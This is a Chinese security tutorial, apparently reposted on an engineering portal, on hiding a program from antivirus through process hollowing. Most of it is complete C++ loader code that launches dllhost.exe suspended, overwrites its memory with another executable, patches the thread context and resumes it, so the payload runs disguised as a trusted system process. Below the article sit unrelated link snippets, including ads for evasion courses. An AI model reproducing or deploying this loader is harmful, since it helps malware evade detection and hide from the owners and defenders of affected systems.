欧美国产亚洲,蜜桃视频一区二区三区四区,国产乱妇无码大片在线观看

1前言

目前的免殺技術(shù),常規(guī)的進(jìn)程執(zhí)行很容易被受攻擊方發(fā)現(xiàn),為了盡可能的隱藏自己,在不利用驅(qū)動(dòng)或者漏洞的情況下我們有用到的技術(shù)很少,這次我們就來講一種可以在3環(huán)達(dá)到進(jìn)程隱藏的方法,進(jìn)程鏤空（傀儡進(jìn)程）。

這種技術(shù)雖然很久之前就有了,但是和其他的免殺技術(shù)相結(jié)合會(huì)達(dá)到很不錯(cuò)的效果。

這種技術(shù)的好處是可以將我們想執(zhí)行的程序偽裝成系統(tǒng)進(jìn)程或者有簽名無檢測(cè)的白名單進(jìn)程,從而繞過殺軟的內(nèi)存檢測(cè)。

2實(shí)現(xiàn)思路

如何去實(shí)現(xiàn)這個(gè)傀儡進(jìn)程,我們就要知道進(jìn)程創(chuàng)建后的步驟是在干什么,進(jìn)程創(chuàng)建后會(huì)在內(nèi)存空間進(jìn)行拉伸PE,那么這一步就是我們達(dá)到偽裝的關(guān)鍵一步。如果我們將這一步拉伸的PE修改成我們自己的PE是不是拉伸的就是我們自己的程序,從而執(zhí)行我們自己的程序。

3執(zhí)行流程

創(chuàng)建一個(gè)掛起的進(jìn)程

這里如果不是掛起狀態(tài)，程序就執(zhí)行起來了，那么我們就沒有足夠的時(shí)間去替換他要執(zhí)行的PE了。

獲取線程上下文

這里獲取上下文的主要目的是作用于修改寄存器，在我們后續(xù)的操作后要去修改。

替換PE信息

將我們上面的實(shí)現(xiàn)思路里最重要的一步在掛起進(jìn)程后去執(zhí)行，這樣進(jìn)程還沒執(zhí)行完成我們可以完成替換。

修改線程上下文

修改寄存器讓執(zhí)行的內(nèi)存發(fā)生改變，修改到我們替換的PE信息。讓程序自身的去解析我們替換的PE結(jié)構(gòu)。

恢復(fù)線程

恢復(fù)線程，讓程序執(zhí)行起來,完成我們的因此。

4實(shí)操順序

寫一個(gè)自己的程序 Demo.exe

#include

intmain(void)
{

MessageBoxA(nullptr, "我是一個(gè)demo程序", "信息:", MB_OK);

return0;
}

這就是一個(gè)很簡(jiǎn)單的程序，我們來編譯執(zhí)行一下。

可以明顯的看到這里有我們執(zhí)行的程序進(jìn)程信息，這樣我們就很容易被發(fā)現(xiàn)。那么下面我就就要去看怎么去隱藏掉這個(gè)進(jìn)程了。步驟會(huì)很多我會(huì)分步驟去寫，讓大家可以跟著步驟去完成這一效果。

加載器實(shí)現(xiàn)流程

創(chuàng)建進(jìn)程

創(chuàng)建一個(gè)系統(tǒng)進(jìn)程或者白名單進(jìn)程再或者你想要讓你的進(jìn)程偽裝的進(jìn)程，這里我們以32位進(jìn)程去演示，我們?nèi):WindowsSysWOW64這個(gè)目錄下隨便去找一個(gè)進(jìn)程即可，這里我就選擇dllhost.exe

這里我們?cè)趧?chuàng)建個(gè)項(xiàng)目去寫另外的代碼，demo程序就不要去改動(dòng)了。

load 右鍵屬性 -> 配置屬性 -> 鏈接器 -> 系統(tǒng) -> 子系統(tǒng) 改為窗口不然后面會(huì)報(bào)0xC0000142錯(cuò)誤 (這里可以寫完所有的代碼再去操作窗口程序不利于我們?nèi)ポ敵鲂畔?

#include
#include

//int CALLBACK WinMain(
// HINSTANCE hInstance,
// HINSTANCE hPrevInstance,
// LPSTR lpCmdLine,
// int nCmdShow
//)
intmain(void)
{
// 獲取 32位dllhost.exe路徑
charpickerHostPath[MAX_PATH] = { 0};
ExpandEnvironmentStringsA("%SystemRoot%\SysWOW64\dllhost.exe", pickerHostPath, MAX_PATH);

// 打開進(jìn)程
STARTUPINFOA si = { sizeof(STARTUPINFOA) };
PROCESS_INFORMATION pi = { 0};
if(!CreateProcessA(NULL, pickerHostPath, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi)) // 掛起形式創(chuàng)建
{
return-1;
}

std::cout<< "process pid:"?<< pi.dwProcessId << std::endl;
??std::cin.get();
??
??// 結(jié)束進(jìn)程(調(diào)試的時(shí)候方便一下 可以不寫)
??TerminateProcess(pi.hProcess, -1);
??std::cout?<< "process exit!!!!!!!"?<< std::endl;
??std::cin.get();
??return?0;
}

這里我們就已經(jīng)以掛起的方式去創(chuàng)建了一個(gè)進(jìn)程，怎么樣去看我們的進(jìn)程是否為掛起呢？我們?nèi)蝿?wù)管理器可以看到。

讀取我們需要真正執(zhí)行的exe

#include
#include

#defineEXE_PATH R"(C:UsersadminDesktopcode傀儡進(jìn)程Debugdemo.exe)"

//int CALLBACK WinMain(
// HINSTANCE hInstance,
// HINSTANCE hPrevInstance,
// LPSTR lpCmdLine,
// int nCmdShow
//)
intmain(void)
{
// 獲取 32位dllhost.exe路徑
charpickerHostPath[MAX_PATH] = { 0};
ExpandEnvironmentStringsA("%SystemRoot%\SysWOW64\dllhost.exe", pickerHostPath, MAX_PATH);

// 打開進(jìn)程
STARTUPINFOA si = { sizeof(STARTUPINFOA) };
PROCESS_INFORMATION pi = { 0};
if(!CreateProcessA(NULL, pickerHostPath, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi)) // 掛起形式創(chuàng)建
{
return-1;
}

std::cout<< "process pid:"?<< pi.dwProcessId << std::endl;
??std::cin.get();

??// 打開文件
??HANDLE hFile = CreateFileA(EXE_PATH, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
??if?(hFile == INVALID_HANDLE_VALUE)
??{
????// 打開失敗結(jié)束之前的進(jìn)程
????TerminateProcess(pi.hProcess, 1);
????return?-1;
??}

??// 獲取文件的大小
??DWORD nSizeOfFile = GetFileSize(hFile, NULL);
??std::cout?<< "file size:"?<< nSizeOfFile << std::endl;

??// 申請(qǐng)內(nèi)存保存Exe字節(jié)碼
??char* image = (char*)VirtualAlloc(NULL, nSizeOfFile, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

??// 把文件讀取到我們申請(qǐng)的緩存區(qū)
??DWORD read;
??if?(!ReadFile(hFile, image, nSizeOfFile, &read, NULL))
??{
????TerminateProcess(pi.hProcess, 1);
????return?-1;
??}

??// 關(guān)閉文件
??CloseHandle(hFile);


??
??// 結(jié)束進(jìn)程(調(diào)試的時(shí)候方便一下 可以不寫)
??TerminateProcess(pi.hProcess, -1);
??std::cout?<< "process exit!!!!!!!"?<< std::endl;
??std::cin.get();
??return?0;
}

可以看出來我們需要執(zhí)行的exe已經(jīng)被我們加載到我們內(nèi)存當(dāng)中。

替換PE

#include
#include
#include

#defineEXE_PATH R"(C:UsersadminDesktopcode傀儡進(jìn)程Debugdemo.exe)"

//int CALLBACK WinMain(
// HINSTANCE hInstance,
// HINSTANCE hPrevInstance,
// LPSTR lpCmdLine,
// int nCmdShow
//)
intmain(void)
{
// 獲取 32位dllhost.exe路徑
charpickerHostPath[MAX_PATH] = { 0};
ExpandEnvironmentStringsA("%SystemRoot%\SysWOW64\dllhost.exe", pickerHostPath, MAX_PATH);

// 打開進(jìn)程
STARTUPINFOA si = { sizeof(STARTUPINFOA) };
PROCESS_INFORMATION pi = { 0};
if(!CreateProcessA(NULL, pickerHostPath, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi)) // 掛起形式創(chuàng)建
{
return-1;
}

std::cout<< "process pid:"?<< pi.dwProcessId << std::endl;
??std::cin.get();

??// 打開文件
??HANDLE hFile = CreateFileA(EXE_PATH, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
??if?(hFile == INVALID_HANDLE_VALUE)
??{
????// 打開失敗結(jié)束之前的進(jìn)程
????TerminateProcess(pi.hProcess, 1);
????return?-1;
??}

??// 獲取文件的大小
??DWORD nSizeOfFile = GetFileSize(hFile, NULL);
??std::cout?<< "file size:"?<< nSizeOfFile << std::endl;

??// 申請(qǐng)內(nèi)存保存Exe字節(jié)碼
??char* image = (char*)VirtualAlloc(NULL, nSizeOfFile, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

??// 把文件讀取到我們申請(qǐng)的緩存區(qū)
??DWORD read;
??if?(!ReadFile(hFile, image, nSizeOfFile, &read, NULL))
??{
????TerminateProcess(pi.hProcess, 1);
????return?-1;
??}

??// 關(guān)閉文件
??CloseHandle(hFile);

??// 解析PE
??// 獲取dos頭
??PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)image;
??if?(dos->e_magic != IMAGE_DOS_SIGNATURE) // 判斷是否為MZ
{
TerminateProcess(pi.hProcess, 1);
return1;
}

// 獲取nt頭
PIMAGE_NT_HEADERS nt = (PIMAGE_NT_HEADERS)(image + dos->e_lfanew);

// 獲取線程上下文
CONTEXT ctx;
ctx.ContextFlags = CONTEXT_FULL;
GetThreadContext(pi.hThread, &ctx);

// 獲取模塊基質(zhì)
ULONG_PTR base;
ReadProcessMemory(pi.hProcess, (PVOID)(ctx.Ebx + (sizeof(SIZE_T) * 2)), &base, sizeof(ULONG_PTR), NULL);

// 在默認(rèn)基質(zhì)下申請(qǐng)內(nèi)存并且 設(shè)置屬性為讀寫執(zhí)行
LPVOID mem = VirtualAllocEx(pi.hProcess, (PVOID)(nt->OptionalHeader.ImageBase), nt->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if(!mem)
{
TerminateProcess(pi.hProcess, 1);
return1;
}

// 替換PE頭
WriteProcessMemory(pi.hProcess, mem, image, nt->OptionalHeader.SizeOfHeaders, NULL);

for(inti = 0; i < nt->FileHeader.NumberOfSections; i++)
{
// 獲取節(jié)表 寫入節(jié)表
PIMAGE_SECTION_HEADER sec = (PIMAGE_SECTION_HEADER)((LPBYTE)image + dos->e_lfanew + sizeof(IMAGE_NT_HEADERS) + (i * sizeof(IMAGE_SECTION_HEADER)));
WriteProcessMemory(pi.hProcess, (PVOID)((LPBYTE)mem + sec->VirtualAddress), (PVOID)((LPBYTE)image + sec->PointerToRawData), sec->SizeOfRawData, NULL);
}

// 結(jié)束進(jìn)程(調(diào)試的時(shí)候方便一下 可以不寫)
TerminateProcess(pi.hProcess, -1);
std::cout<< "process exit!!!!!!!"?<< std::endl;
??std::cin.get();
??return?0;
}

GetThreadContext是什么意思呢?獲取線程上下文，我們這時(shí)候用調(diào)試器附加一下dllhost看下我們獲取的是什么東西。主要獲取的就是目前的寄存器的值。后續(xù)我們需要讀寫這個(gè)值,從而達(dá)到執(zhí)行我們自己的PE信息。

開始替換PE頭我們可以注意一下寫入了什么。

這里是替換節(jié)區(qū)。

走到這里就說明我們的PE已經(jīng)被完全替換了，那么我們需要給他替換一下寄存器才能讓他執(zhí)行起來。

設(shè)置線程上下文，恢復(fù)線程

ebx+8的位置本身存放的是原來默認(rèn)的PE，我們這里給他替換成我們申請(qǐng)內(nèi)存的PE，然后恢復(fù)線程基本就完成了我們的隱藏。

#include
#include
#include

#defineEXE_PATH R"(C:UsersadminDesktopcode傀儡進(jìn)程Debugdemo.exe)"

//int CALLBACK WinMain(
// HINSTANCE hInstance,
// HINSTANCE hPrevInstance,
// LPSTR lpCmdLine,
// int nCmdShow
//)
intmain(void)
{
// 獲取 32位dllhost.exe路徑
charpickerHostPath[MAX_PATH] = { 0};
ExpandEnvironmentStringsA("%SystemRoot%\SysWOW64\dllhost.exe", pickerHostPath, MAX_PATH);

// 打開進(jìn)程
STARTUPINFOA si = { sizeof(STARTUPINFOA) };
PROCESS_INFORMATION pi = { 0};
if(!CreateProcessA(NULL, pickerHostPath, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi)) // 掛起形式創(chuàng)建
{
return-1;
}

std::cout<< "process pid:"?<< pi.dwProcessId << std::endl;
??std::cin.get();

??// 打開文件
??HANDLE hFile = CreateFileA(EXE_PATH, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
??if?(hFile == INVALID_HANDLE_VALUE)
??{
????// 打開失敗結(jié)束之前的進(jìn)程
????TerminateProcess(pi.hProcess, 1);
????return?-1;
??}

??// 獲取文件的大小
??DWORD nSizeOfFile = GetFileSize(hFile, NULL);
??std::cout?<< "file size:"?<< nSizeOfFile << std::endl;

??// 申請(qǐng)內(nèi)存保存Exe字節(jié)碼
??char* image = (char*)VirtualAlloc(NULL, nSizeOfFile, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

??// 把文件讀取到我們申請(qǐng)的緩存區(qū)
??DWORD read;
??if?(!ReadFile(hFile, image, nSizeOfFile, &read, NULL))
??{
????TerminateProcess(pi.hProcess, 1);
????return?-1;
??}

??// 關(guān)閉文件
??CloseHandle(hFile);

??// 解析PE
??// 獲取dos頭
??PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)image;
??if?(dos->e_magic != IMAGE_DOS_SIGNATURE) // 判斷是否為MZ
{
TerminateProcess(pi.hProcess, 1);
return1;
}

// 獲取nt頭
PIMAGE_NT_HEADERS nt = (PIMAGE_NT_HEADERS)(image + dos->e_lfanew);

// 獲取線程上下文
CONTEXT ctx;
ctx.ContextFlags = CONTEXT_FULL;
GetThreadContext(pi.hThread, &ctx);

// 獲取模塊基質(zhì)
ULONG_PTR base;
ReadProcessMemory(pi.hProcess, (PVOID)(ctx.Ebx + (sizeof(SIZE_T) * 2)), &base, sizeof(ULONG_PTR), NULL);

// 在默認(rèn)基質(zhì)下申請(qǐng)內(nèi)存并且 設(shè)置屬性為讀寫執(zhí)行
LPVOID mem = VirtualAllocEx(pi.hProcess, (PVOID)(nt->OptionalHeader.ImageBase), nt->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if(!mem)
{
TerminateProcess(pi.hProcess, 1);
return1;
}

// 替換PE頭
WriteProcessMemory(pi.hProcess, mem, image, nt->OptionalHeader.SizeOfHeaders, NULL);

for(inti = 0; i < nt->FileHeader.NumberOfSections; i++)
{
// 獲取節(jié)表 寫入節(jié)表
PIMAGE_SECTION_HEADER sec = (PIMAGE_SECTION_HEADER)((LPBYTE)image + dos->e_lfanew + sizeof(IMAGE_NT_HEADERS) + (i * sizeof(IMAGE_SECTION_HEADER)));
WriteProcessMemory(pi.hProcess, (PVOID)((LPBYTE)mem + sec->VirtualAddress), (PVOID)((LPBYTE)image + sec->PointerToRawData), sec->SizeOfRawData, NULL);
}

// 修改寄存器
ctx.Eax = (SIZE_T)((LPBYTE)mem + nt->OptionalHeader.AddressOfEntryPoint);
WriteProcessMemory(pi.hProcess, (PVOID)(ctx.Ebx + (sizeof(SIZE_T) * 2)), &nt->OptionalHeader.ImageBase, sizeof(PVOID), NULL);

SetThreadContext(pi.hThread, &ctx);
ResumeThread(pi.hThread);
WaitForSingleObject(pi.hProcess, -1);

std::cout<< "進(jìn)程隱藏執(zhí)行完成"?<< std::endl;
??
??// 結(jié)束進(jìn)程(調(diào)試的時(shí)候方便一下 可以不寫)
??// TerminateProcess(pi.hProcess, -1);
??// std::cout << "process exit!!!!!!!" << std::endl;
??// std::cin.get();
??return?0;
}

修復(fù)執(zhí)行錯(cuò)誤

這里我們可以看到提示了錯(cuò)誤框，我們修改下子系統(tǒng)。

intCALLBACKWinMain(
HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
intnCmdShow
)
子系統(tǒng)改為窗口后 main函數(shù)需要改成WinMain

完畢

可以看到我們進(jìn)程運(yùn)行起來了,那么我們看看這個(gè)進(jìn)程是什么。

從線程里面可以看出，我們是從這個(gè)dllhost里面去執(zhí)行的我們的程序，那么我們看下是不是找不到我們?cè)瓉淼倪M(jìn)程了。

可以看到這里已經(jīng)確定沒有demo.exe,至此我們的隱藏進(jìn)程實(shí)現(xiàn)完成。

5總結(jié)

隱藏的時(shí)候需要提前找到一個(gè)載體。

我們目前通過的是讀取文件獲取我們demo的exe，可以提前獲取好，放到我們的內(nèi)存中，這樣更隱蔽。

需要注意main函數(shù)和winmain，main函數(shù)會(huì)報(bào)錯(cuò)

審核編輯：湯梓紅

聲明：本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人，不代表電子發(fā)燒友網(wǎng)立場(chǎng)。文章及其配圖僅供工程師學(xué)習(xí)之用，如有內(nèi)容侵權(quán)或者其他違規(guī)問題，請(qǐng)聯(lián)系本站處理。舉報(bào)投訴

內(nèi)存

內(nèi)存

+關(guān)注

關(guān)注
8

文章
2966

瀏覽量
73814
程序

程序

+關(guān)注

關(guān)注
116

文章
3756

瀏覽量
80754

原文標(biāo)題：免殺技術(shù)進(jìn)程隱藏

文章出處：【微信號(hào)：蛇矛實(shí)驗(yàn)室，微信公眾號(hào)：蛇矛實(shí)驗(yàn)室】歡迎添加關(guān)注！文章轉(zhuǎn)載請(qǐng)注明出處。

評(píng)論

相關(guān)推薦

進(jìn)程執(zhí)法官

，包括系統(tǒng)核心進(jìn)程、殺毒不需要進(jìn)入安全模式。 2、可以查看普通進(jìn)程（與任務(wù)管理器類似）、網(wǎng)絡(luò)進(jìn)程（TCP-UDP端口關(guān)聯(lián)進(jìn)程）、隱藏進(jìn)程

發(fā)表于 09-04 23:12

ekrn.exe進(jìn)程是什么意思，如何解決ekrn.exe進(jìn)程占空間的問題

%原因分析1、ekrn.exe占用cpu100％問題屬于該殺毒軟件在查殺系統(tǒng)進(jìn)程時(shí)的正常現(xiàn)象，因?yàn)閟vchost.exe不斷重啟運(yùn)行導(dǎo)致，這個(gè)是win系統(tǒng)bug，與殺軟件無關(guān)，所以不用更改殺軟任何設(shè)置

發(fā)表于 12-22 16:42

迅雷7.2.7.3496下載(迅雷7增強(qiáng)版VIP離線免等待V2) v7.2.7.3496綠...

會(huì)員補(bǔ)丁(可去廣告、隱藏右側(cè)欄、點(diǎn)亮VIP6、離線免等待) │ ├—√迅雷離線下載組件(迅雷等級(jí)16級(jí)及其以上等級(jí)有1.5G離線空間) │ ├—除去主界面上的迅雷VIP按鈕 (主界面上紅色的迅雷VIP

發(fā)表于 04-24 17:45

小七免殺論壇vip 2013源碼免殺培訓(xùn)課程

小七免殺論壇vip 2013源碼免殺培訓(xùn)課程目錄（今日免key發(fā)布）小七免

發(fā)表于 10-05 17:35

聯(lián)通免流量軟件有哪些？聯(lián)通免流量軟件？

聯(lián)通手機(jī)免流量上網(wǎng)軟件有哪些？聯(lián)通2G3G4G免流量軟件加我***聯(lián)通最新免流量上網(wǎng)軟件，支持全國(guó)地區(qū)使用，一年穩(wěn)定技術(shù)開發(fā)并且經(jīng)過測(cè)試，安裝后上網(wǎng)百分百

發(fā)表于 07-22 08:37

國(guó)際聯(lián)網(wǎng)展現(xiàn)黑科技-雷霆技術(shù)攜三免技術(shù)參展

，由雷霆技術(shù)公司帶來的不用電池、無需聯(lián)網(wǎng)、無需鑰匙的智能鎖黑科技——三免智能鎖方案。在本次展會(huì)中為數(shù)不多的，創(chuàng)新型技術(shù)中，三免智能鎖技術(shù)吸引

發(fā)表于 08-07 15:07

特洛伊木馬隱藏技術(shù)研究

首先介紹了傳統(tǒng)的木馬隱藏方法，由于傳統(tǒng)方法主要集中于本地進(jìn)程的隱藏，對(duì)木馬兩端之間通信隱藏涉及甚少，而本文所采用的基于ICMP的連接技術(shù)能夠

發(fā)表于 06-15 08:33 ?11次下載

木馬/后門程序在WINNT中進(jìn)程隱藏和查找的方法

　　在WIN9X中，只需要將進(jìn)程注冊(cè)為系統(tǒng)服務(wù)就能夠從進(jìn)程查看器中隱形，可是這一切在WINNT中卻完全不同，無論木馬從端口、啟動(dòng)文件上如何巧妙地隱藏自己，始終都不能欺騙WINN

發(fā)表于 09-01 11:51 ?1106次閱讀

基于硬件輔助虛擬化技術(shù)的交叉視圖進(jìn)程檢測(cè)

分析了進(jìn)程隱藏技術(shù)和檢測(cè)技術(shù),對(duì)Strider Ghost Buster所使用的交叉視圖進(jìn)程檢測(cè)技術(shù)

發(fā)表于 02-13 16:17 ?32次下載

軟WAF上傳繞過+wbehshell免殺

軟WAF上傳繞過+wbehshell免殺

發(fā)表于 09-07 10:35 ?4次下載

密文域可逆信息隱藏技術(shù)發(fā)展

可逆信息隱藏是信息隱藏技術(shù)的新興研究方向，密文域可逆信息隱藏作為加密域信號(hào)處理技術(shù)與信息隱藏

發(fā)表于 12-09 10:28 ?0次下載

如何安裝 unhide 并搜索隱藏的進(jìn)程和 TCP/UDP 端口

unhide 是一個(gè)小巧的網(wǎng)絡(luò)取證工具，能夠發(fā)現(xiàn)那些借助 rootkit、LKM 及其它技術(shù)隱藏的進(jìn)程和 TCP/UDP 端口。這個(gè)工具在 Linux、UNIX 類、MS-Windows 等操作系統(tǒng)下都可以工作。

發(fā)表于 01-31 09:57 ?2.7w次閱讀

一行代碼教你如何隱藏Linux進(jìn)程

總有朋友問隱藏Linux進(jìn)程的方法，我說你想隱藏到什么程度，是大隱于內(nèi)核，還是小隱于用戶。網(wǎng)上通篇論述的無外乎 hook 掉 procfs 或者類似的用戶態(tài)方案，也都難免長(zhǎng)篇大論，我說，這些場(chǎng)面都太大了，太復(fù)雜了。對(duì)于希望馬上看

發(fā)表于 09-15 15:16 ?2202次閱讀

免殺技術(shù)與殺軟技術(shù)的區(qū)別

免殺，又叫免殺毒技術(shù)，是反病毒，反間諜的對(duì)立面，是一種能使病毒或木馬免于被殺毒軟件查殺的軟件。

發(fā)表于 07-08 10:49 ?1480次閱讀

什么是白加黑技術(shù) 免殺技術(shù)之白加黑攻擊防御技術(shù)分析

在很多的殺軟中會(huì)對(duì)白文件的操作進(jìn)行放行，如果我們將黑程序和白程序在一個(gè)進(jìn)程中是否就可以繞過一些殺軟的檢測(cè)。

發(fā)表于 07-24 10:37 ?1458次閱讀